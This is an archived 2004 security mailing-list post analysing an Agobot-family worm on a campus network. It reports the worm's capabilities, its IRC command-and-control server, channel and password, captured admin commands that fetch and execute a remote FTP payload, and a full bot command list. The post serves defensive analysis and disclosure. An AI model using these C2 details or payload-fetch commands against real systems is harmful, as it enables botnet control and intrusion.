[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20040424224716.E7B7143E32@ws1-9.us4.outblaze.com>
From: isec at europe.com (Willem Koenings)
Subject: Re: Outbreak of a virus on campus
----- Original Message -----
From: "Morning Wood"
Date: Sat, 24 Apr 2004 18:37:31 +0000
To: mueller@...net.com, full-disclosure@...ts.netsys.com
Subject: RE: [Full-Disclosure] Re: Outbreak of a virus on campus
> phatbot?
This one is yet another agobot. Has long list of useful commands
(included in the end of posting, if someone is interested...),
polymorph capability, stealth capability -hides its own process
in memory and binary from listing, capable of updating itself
via ftp/http, has list of servers for evaluating connection speed,
steals cdkeys, sniffs a wire, performs ddos, capable installing
a proxy, sends spam via aol, can install identd, has LONG list
various processes to kill (mostly AV, but also regedit and tcpview
among others), retrievs sysinfo, makes screenshots etc etc etc -
looks similar to others good household bot's :)
What makes its interesting - its stealth capability and propagation.
It has following scanning/propagation subroutines:
CScannerBagle
CScannerBase
CScannerDCOM
CScannerDoom
CScannerDW
CScannerHTTP
CScannerNetBios
CScannerOptix
CScannerSQL
CScannerUPNP
CScannerWKS
When worm is started, it connects to irc server
193.87.20.31 (irc.weednet.net) port 7000.
Then it joines to password ptotected channel
#1337, password is heyho. As channel topic is
.scan.startall, it accepts command and starts
right away scanning.
I took my trusty irc client and joined to that
channel by myself. Right away admin gave me those
commands:
<admin> .login stebo jamesbond007 -s
<admin> .ftp.update ftp://ftp:bla@....uni-freiburg.de/incoming/dt.exe %TEMP%\xgf.exeBLAOR12
<admin> .scan.stop
<admin> .ftp.update ftp://ftp:bla@....uni-freiburg.de/incoming/dt.exe c:\xgf.exe BLAOR12
seems like my 'bot' version was too old :)
have fun :)
W.
-----------------------
commands and parameters
all commands starts with . (dot)
irc.screencap
takes a screenshot of the active desktop
irc.server
changes the server the bot connects to
irc.reconnect
reconnects to the server
irc.raw
sends a raw message to the irc server
irc.quit
quits the bot
irc.privmsg
sends a privmsg
irc.part
makes the bot part a channel
irc.netinfo
prints netinfo
irc.mode
lets the bot perform a mode change
irc.join
makes the bot join a channel
irc.gethost.join
makes the <host> bot joins channel you want
irc.getedu.join
makes the .edu bots join channel you want
irc.gethost
prints netinfo when host matches
irc.getedu
prints netinfo when the bot is .edu
irc.dccsend
sends a file over dcc
irc.action
lets the bot perform an action
irc.disconnect
disconnects the bot from irc
bot.command
runs a command with system()
bot.unsecure
enable shares / enable dcom
bot.secure
delete shares / disable dcom
bot.flushdns
flushes the bots dns cache
bot.quit
bot.highspeed
If speed > 5000 then bot will respond
bot.longuptime
If uptime > 7 days then bot will respond
bot.sysinfo
displays the system info
bot.status
gives status
bot.rndnick
makes the bot generate a new random nick
bot.removeallbut
removes the bot if id does not match
bot.remove
removes the bot
bot.open
opens a file (whatever)
bot.nick
changes the nickname of the bot
bot.id
displays the id of the current code
bot.execute
makes the bot execute a .exe
bot.dns
resolves ip/hostname by dns
bot.die
terminates the bot
bot.about
displays the info the author wants you to see
shell.disable
Disable shell handler
shell.enable
Enable shell handler
shell.handler
FallBack handler for shell
commands.list
Lists all available commands
plugin.unload
unloads a plugin (not supported yet)
plugin.load
loads a plugin
cvar.saveconfig
saves config to a file
cvar.loadconfig
loads config from a file
cvar.set
sets the content of a cvar
cvar.get
gets the content of a cvar
cvar.list
prints a list of all cvars
inst.svcdel
deletes a service from scm
inst.svcadd
adds a service to scm
inst.asdel
deletes an autostart entry
inst.asadd
adds an autostart entry
logic.ifram
exec command if RAM Total is bigger than specified (RAM)
logic.ifdiskfree
exec command if free disk space available is bigger than specified (GB)
logic.ifcpu
exec command if proccesors CPU speed is bigger than specified (MHz)
logic.ifedu
exec command if bot is an edu
logic.ifspeed
exec command if speed(via speedtest) is bigger than specified
logic.ifuptime
exec command if uptime is bigger than specified
login
logs the user in
mac.logout
logs the user out
delay.minutes
delays a command a set amount of minutes
ftp.update
executes a file from a ftp url
ftp.execute
updates the bot from a ftp url
ftp.download
downloads a file from ftp
http.command
reads command(s) from a specified url
http.visit
visits an url
http.update
executes a file from a http url
http.execute
updates the bot from a http url
http.download
downloads a file from http
HttpCommand.Net
HttpCommand
file.find
finds a file (not added yet)
file.list
lists contents of a directory
file.rmdir
deletes a directory
file.mkdir
creates a directory
file.move
moves a file
file.delete
deleted a file
rsl.logoff
logs the user off
rsl.shutdown
shuts the computer down
rsl.reboot
reboots the computer
pctrl.killpid
kills a pid
pctrl.killsvc
deletes/stops service
pctrl.listsvc
lists all services
pctrl.kill
kills a process
pctrl.list
lists all processes
http.speedtest
Speed Test to see how fast the bot.
scan.stats
displays stats of the scanner
scan.stop
signal stop to child threads
scan.start
signal start to child threads
scan.stopall
disable all Scanners and stop scanning
scan.startall
enable all Scanners and start scanning
scan.disable
disables a scanner module
scan.enable
enables a scanner module
scan.resetnetranges
resets netranges to the localhost
scan.clearnetranges
clears all netranges registered with the scanner
scan.listnetranges
lists all netranges registered with the scanner
scan.delnetrange
deletes a netrange from the scanner
scan.addnetrange
adds a netrange to the scanner
ddos.stop
stops all floods
redirect.stop
stops all redirects running
redirect.socks
starts a socks4 proxy
harvest.cdkeys
makes the bot get a list of cdkeys
bot.repeat
inst_polymorph
Installer - Polymorph on install ?
vuln_channel
Vuln Daemon Sniffer Channel
sniffer_channel
Sniffer - Output channel
sniffer_enabled
Sniffer - Enabled ?
spam_aol_enabled
AOL Spam - Enabled ?
spam_aol_channel
AOL Spam - Channel name
scaninfo_level
Info Level 1(less) - (3)more
scaninfo_chan
Scanner - Output channel
cdkey_windows
Return Windows Product Keys on cdkey.get
identd_enabled
IdentD - Enable the server
redir_maxthreads
Redirect - Maximum Number of threads
ddos_maxthreads
DDOS - Maximum Number of threads
scan_maxsockets
Scanner - Maximum Number of sockets
scan_maxthreads
Scanner - Maximum Number of threads
as_service_name
Autostart - Short service name
as_service
Autostart - Start as service
as_enabled
Autostart - Enabled
as_valname
Autostart - Value Name
do_stealth
Bot - Enable Stealth
do_avkill
Bot - Enable AV kill
do_speedtest
Bot - Do speedtest on startup
bot_topiccmd
Bot - Execute topic commands
bot_mutex_name
Bot - Mutex name
bot_mutex
Bot - Create mutex
bot_meltserver
Bot - Melt the original server file
bot_randnick
Bot - Random nicks of Letters and Numbers
bot_compnick
Bot - Use the computer name as a nickname
bot_seclogin
Bot - Enable login only by channel messages
bot_timeout
Bot - Timeout for receiving in miliseconds
bot_prefix
Bot - Command Prefix
bot_id
Bot - Current ID
bot_filename
Bot - Runtime Filename
bot_version
0.3.0
Bot - Version
si_nick
Server Info - Nickname
si_usessl
Server Info - Use SSL ?
si_servpass
Server Info - Server Password
si_server
Server Info - Server Address
si_port
Server Info - Server Port
si_nickprefix
Server Info - Nickname prefix
si_mainchan
Server Info - Main Channel
si_chanpass
Server Info - Channel Password
bot_ftrans_port_ftp
Bot - File Transfer Port for FTP
bot_ftrans_port
Bot - File Transfer Port
--
___________________________________________________________
Sign-up for Ads Free at Mail.com
http://promo.mail.com/adsfreejump.htm
Powered by blists - more mailing lists